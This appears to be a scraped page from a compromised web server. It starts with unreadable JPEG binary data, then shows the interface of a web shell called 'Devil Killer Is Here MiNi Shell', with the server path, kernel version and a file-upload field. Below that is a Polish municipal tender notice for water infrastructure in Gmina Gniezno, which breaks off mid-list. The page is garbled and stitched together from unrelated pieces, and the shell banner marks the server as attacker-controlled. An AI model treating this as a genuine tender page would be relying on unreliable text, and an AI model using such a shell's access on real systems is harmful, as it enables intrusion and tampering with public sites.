JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240711/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240711/0040868801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa nowego ujęcia wody wraz ze stacją podnoszenia ciśnienia wody oraz nowej infrastruktury wodociągowej w południowo-wschodniej części gminy Gniezno </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA GNIEZNO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 631259519</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Aleje Władysława Stanisława Reymonta 9-11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gniezno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL414 - Koniński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">614245750</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">614245751</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@urzadgminy.gniezno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.urzadgminy.gniezno.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa nowego ujęcia wody wraz ze stacją podnoszenia ciśnienia wody oraz nowej infrastruktury wodociągowej w południowo-wschodniej części gminy Gniezno </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a629f96d-5beb-4b35-bc12-786f64e1eb47</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00408688</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00002595/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.18 Budowa nowego ujęcia wody wraz ze stacją podnoszenia ciśnienia wody oraz nowej infrastruktury wodociągowej w południowo-wschodniej części gminy Gniezno</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/952925 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/952925 <br/>opcja : &#34;Wyślij wiadomość do Zamawiającego&#34;</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://platformazakupowa.pl/transakcja/952925</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Wójt Gminy Gniezno;<br/>2) administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować<br/>pod adresem e-mail: iod@lesny.com.pl.<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO zgodnie z<br/>przepisami ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (dalej Pzp), w celu<br/>prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego oraz jego<br/>rozstrzygnięcia, jak również zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji,<br/>a także udokumentowania postępowania o udzielenie zamówienia publicznego i jego archiwizacji;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona<br/>zostanie dokumentacja postępowania w oparciu o art. 18 i art. 74 ustawy Pzp oraz inne podmioty,<br/>które przetwarzają dane osobowe na podstawie stosownych umów zawartych z Administratorem<br/>(np. podmioty świadczące usługi informatyczne).<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Pzp przez okres 4 lat od<br/>dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy; następnie dane przechowywane<br/>będą przez okres wskazany w instrukcji kancelaryjnej oraz jednolitym rzeczowym wykazie akt na<br/>podstawie art. 6 ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach,<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących<br/>jest wymogiem ustawowym określonym w przepisanych ustawy Pzp, związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego. Konsekwencją ich niepodania jest przede<br/>wszystkim brak możliwości wzięcia udziału w postępowaniu o udzielenie zamówienia publicznego;<br/>inne konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany.<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących<br/>(w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie<br/>dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających<br/>na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie<br/>zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego<br/>postępowania o udzielenie zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie<br/>z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP<br/>oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub<br/>konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia<br/>przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej,<br/>lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193<br/>Warszawa, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących<br/>narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GR.271.30.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest Budowa nowego ujęcia wody wraz ze stacją podnoszenia ciśnienia wody oraz nowej infrastruktury wodociągowej w południowo-wschodniej części gminy Gniezno.<br/><br/> Budowa nowego ujęcia wody wraz ze stacją podnoszenia ciśnienia wody oraz nowej infrastruktury wodociągowej w południowo-wschodniej części gminy Gniezno. Projekt realizowany w formule zaprojektuj i wybuduj. W ramach realizacji projektu wykorzystana zostanie istniejąca infrastruktura wodociągowa oraz rozbudowa, przebudowa i modernizacja istniejącej infrastruktury wodociągowej.<br/><br/>Szczegóły Zawarto w SWZ, PFU i załącznikach do postępowania. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45252120-5 - Roboty budowlane w zakresie zakładów uzdatniania wody</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45262220-9 - Wiercenie studni wodnych</p> <p class="mb-0">45232430-5 - Roboty w zakresie uzdatniania wody</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje zastosowanie prawa opcji. W przypadku otworu negatywnego Gmina wskaże inną lokalizację nowego ujęcia wody. Lokalizacja ujęcia nr III w odległości do 1 km od SUW w Jankówku dz. 5/12. Studnię należy włączyć do istniejącego obiektu rurociągiem tłocznym o średnicy D160.<br/>W celu uruchomienia prawa opcji Zamawiający złoży Wykonawcy pisemne oświadczenie woli w przedmiocie skorzystania z prawa opcji w terminie obowiązywania umowy.<br/>Oświadczenie będzie zawierało potwierdzenie środków finansowych na zrealizowanie zamówienia i będzie stanowiło załącznik do umowy.<br/>Prawo opcji jest jednostronnym uprawnieniem Zamawiającego, z którego może, ale nie ma obowiązku skorzystać w ramach realizacji przedmiotu zamówienia. W przypadku nie skorzystania przez Zamawiającego z prawa opcji Wykonawcy nie przysługują żadne roszczenia z tego tytułu.<br/><br/>Jeżeli Zamawiający skorzysta z prawa opcji obowiązkiem umownym wykonawcy jest wykonanie świadczenia w zakresie objętym wykorzystanym prawem opcji.<br/>Uruchomienie opcji nie będzie wymagało zmiany umowy. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający oceni i porówna jedynie te oferty, które :<br/>1) zostaną złożone przez Wykonawców nie wykluczonych przez Zamawiającego z<br/>niniejszego postępowania;<br/>2) nie zostaną odrzucone przez Zamawiającego.<br/>2. Oferty zostaną ocenione przez Zamawiającego w oparciu o następujące kryteria i ich<br/>znaczenie:<br/>1) Kryterium nr 1 - Cena – 60 %<br/>W ramach tego kryterium Wykonawca może otrzymać maksymalnie 60 pkt.<br/>2) Kryterium nr 2 – Okres gwarancji – 40%<br/>W ramach tego kryterium Wykonawca może otrzymać maksymalnie 40 pkt.<br/>3. Sposób oceny ofert:<br/>Zamawiający będzie oceniał oferty przyznając ofertom punkty, z zastosowaniem następujących<br/>zasad i wzorów:<br/>1) Kryterium nr 1 - cena:<br/>najniższa cena oferty brutto<br/>-------------------------------------- x 60 = ilość punktów<br/>cena badanej oferty brutto<br/>2) Kryterium nr 2 – okres gwarancji:<br/>Liczba punktów zostanie przyznana następująco:<br/>− okres gwarancji 36 miesięcy – 0 pkt,<br/>− okres gwarancji 60 miesięcy – 40 pkt.<br/>W przypadku zaoferowania minimalnej długości okresu gwarancji, tj. 36 miesięcy,<br/>Wykonawca otrzyma zero (0) punktów.<br/>W przypadku zaoferowania maksymalnej długości okresu gwarancji, tj. 60 miesięcy,<br/>Wykonawca otrzyma czterdzieści (40) punktów. W przypadku zaoferowania gwarancji<br/>pomiędzy 36 a 60 miesięcy, Wykonawca otrzyma pkt wg wzoru:<br/>okres gwarancji w ofercie badanej<br/>---------------------------------------------------------------------------------------- x 40 = ilość punktów<br/>najdłuższy zaoferowany okres gwarancji spośród ofert badanych<br/>Minimalny okres gwarancji wymagany przez Zamawiającego wynosi 36 miesięcy,<br/>maksymalny 60 miesięcy. W przypadku zaoferowania przez Wykonawcę dłuższego okresu<br/>gwarancji niż 60 miesięcy, Zamawiający do oceny oferty przyjmie okres 60 miesięcy.<br/>W przypadku zaoferowania przez Wykonawcę długości okresu gwarancji i krótszego niż<br/>36 m-cy lub w przypadku braku określenia okresu gwarancji, Zamawiający przyjmie, iż<br/>Wykonawca zaoferował minimalny (wymagany) okres gwarancji (36 miesięcy). W takim<br/>przypadku Wykonawca otrzyma zero (0) punktów.<br/>Wykonawca zobowiązany jest samodzielnie wpisać w Formularzu Oferty oferowany okres<br/>gwarancji.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający wymaga wykazania przez Wykonawcę spełnienia warunków udziału w postępowaniu, określonych w art. 112 ust. 2 pkt 4 ustawy Pzp, odnoszących się do zdolności technicznej lub zawodowej, polegających na:<br/>1) wykonaniu w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną robotę budowlaną zakresie porównywalnym z niniejszym zamówieniem tj. polegającą łącznie na:<br/>a) wykonaniu co najmniej jednego odwiertu otworu studziennego o głębokości powyżej 50 m zakończonego przyłączeniem do SUW;<br/>b) budowie, rozbudowie lub przebudowie Stacji Uzdatniania Wody o wydajności min. 25 m3/h oraz obejmującą wykonanie co najmniej układu technologicznego i automatyki SUW oraz budowę zbiornika wody czystej min. 200m3;<br/>c) budowie kontenerowej pompowni wody;<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki dotyczące doświadczenia określone powyżej Wykonawcy mogą spełniać łącznie.<br/>2) dysponowaniu w trakcie realizacji zamówienia następującymi osobami:<br/>a) Kierownik budowy (1 osoba) – posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji wodociągowych i kanalizacyjnych bez ograniczeń oraz doświadczenie jako kierownik budowy, kierownik robót lub inspektor nadzoru: przy realizacji przynajmniej jednego zadania polegającego na budowie, rozbudowie lub przebudowie stacji uzdatniania<br/>wody.<br/>b) Kierownik robót konstrukcyjnych (1 osoba) – posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej oraz doświadczenie jako kierownik budowy, robót lub inspektor nadzoru przy realizacji przynajmniej jednego zadania polegającego na budowie, rozbudowie lub przebudowie stacji uzdatniania wody.<br/>c) Kierownik robót elektrycznych i AKPiA (1 osoba) – posiadający uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych oraz doświadczenie jako kierownik budowy, kierownik robót lub inspektor nadzoru: przy realizacji przynajmniej<br/>jednego zadania polegającego na budowie, rozbudowie lub przebudowie stacji uzdatniania wody.<br/>d) Projektant specjalności instalacyjnej (1 osoba) – posiadający uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji wodociągowych i kanalizacyjnych bez ograniczeń, oraz doświadczenie w sporządzaniu co najmniej 1 dokumentacji projektowej dla budowy, rozbudowy lub przebudowy stacji uzdatniania wody<br/>e) Projektant specjalności konstrukcyjnej (1 osoba) – posiadający uprawnienia<br/>budowlane do projektowania w specjalności konstrukcyjno-budowlanej bez ograniczeń, oraz doświadczenie w sporządzaniu co najmniej 1 dokumentacji projektowej dla budowy, rozbudowy lub przebudowy stacji uzdatniania wody<br/>f) Projektant specjalności elektrycznej (1 osoba) – posiadający uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń oraz doświadczenie w sporządzaniu co najmniej 1 dokumentacji projektowej dla budowy, rozbudowy lub przebudowy stacji uzdatniania wody.<br/>g) Projektant geolog (1 osoba) – posiadający uprawnienia do projektowania robót geologicznych wydane na podstawie art. 50 ust. 1 i 2 ustawy z dnia 9 czerwca 2011 r. Prawo geologiczne i górnicze (Dz. U. z 2023 r. poz. 633 ze zm.) w kategorii IV lub V; doświadczenie zawodowe obejmujące opracowanie co najmniej jednego projektu robót geologicznych na wykonanie otworów studziennych, w tym co najmniej jednego o głębokości powyżej 50 m.<br/>h) Kierownik robót geologicznych (1 osoba) – posiadający uprawnienia do kierowania pracami geologicznymi wydane na podstawie art. 50 ust. 1 i 2 ustawy z dnia 9 czerwca 2011 r. Prawo geologiczne i górnicze (Dz. U. z 2023 r. poz. 633 ze zm.) w kategorii IV lub V lub XIII; doświadczenie zawodowe obejmujące nadzorowanie co najmniej zadania w zakresie robót geologicznych obejmującego wykonanie otworów studziennych, w tym<br/>co najmniej jednego o głębokości powyżej 50 m.<br/>i) Specjalista ds. modelowania sieci wodociągowej (1 osoba) – posiadający<br/>wykształcenie wyższe techniczne, doświadczenie zawodowe w zaprojektowaniu i wdrożeniu w okresie ostatnich 5 lat wykonał co najmniej dwóch modeli hydraulicznych wraz z kampanią pomiarową opartą o tymczasowe, nieinwazyjne punkty pomiaru dla sieci wodociągowej.<br/>Każda usługa powinna obejmować wykonanie co najmniej 25 punktów pomiarowych z pomiarami w tym samym czasie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia<br/>w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień<br/>złożenia następujących podmiotowych środków dowodowych potwierdzających:<br/>1) spełnianie warunków udziału w postępowaniu, tj.:<br/>a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat,<br/>a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich<br/>rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane<br/>zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź<br/>inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały<br/>wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie<br/>uzyskać tych dokumentów – inne odpowiednie dokumenty. Wzór wykazu robót<br/>załączono do IDW – załącznik nr 4;<br/>b) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego,<br/>w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie<br/>robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia<br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją<br/>o podstawie do dysponowania tymi osobami. Wzór wykazu osób załączono do IDW –<br/>załącznik nr 3.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Kompletna oferta musi zawierać następujące, aktualne na dzień złożenia dokumenty:<br/>1) formularz Oferty, sporządzony na podstawie wzoru stanowiącego załącznik nr 1 